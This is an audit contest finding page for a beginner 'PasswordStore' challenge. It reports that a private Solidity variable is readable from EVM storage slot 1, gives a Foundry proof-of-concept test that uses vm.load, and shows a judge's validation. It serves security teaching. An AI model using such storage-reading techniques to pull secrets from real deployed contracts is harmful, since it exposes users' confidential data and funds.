First Flight #1: PasswordStore
First Flight #1
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

s_password can be read accessing EVM storage

davide

Summary

The state variable s_password is private but the value can still be accessed reading the specific storage slot (slot 1 in this case).

Vulnerability Details

The password is readable on-chain, hence, can be accessed anytime.
Making it private don't prevent it from being read externally.
Here is a Proof of Concept unit test demonstrating the issue (add it to PasswordStoreTest.t.sol):

function test_non_owner_can_read_password() public {
vm.prank(owner);
string memory expectedPassword = "myNewPassword";
passwordStore.setPassword(expectedPassword);
vm.prank(address(1));
// We access the slot 1 of the storage where the password resides and we get the first 13 bytes (expectedPassword length)
bytes13 slotOneValue = bytes13(vm.load(address(passwordStore), bytes32(uint256(1))));
string memory actualPassword = string(abi.encodePacked(slotOneValue));
assertEq(actualPassword, expectedPassword);
}

Impact

Reading the password gives the attacker the ability to access funds or sensitive information.

Tools Used

Manual review.

Recommendations

Storing a password on-chain is considered bad practice.
Everything you put on-chain is visible.
You should not store it in plaintext or eventually store the encrypted or hashed version.
But other problems arise such as rainbow tables ecc.

Updates

Lead Judging Commences

inallhonesty Lead Judge
about 2 years ago
inallhonesty Lead Judge about 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

finding-anyone-can-read-storage

Private functions and state variables are only visible for the contract they are defined in and not in derived contracts. In this case private doesn't mean secret/confidential

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.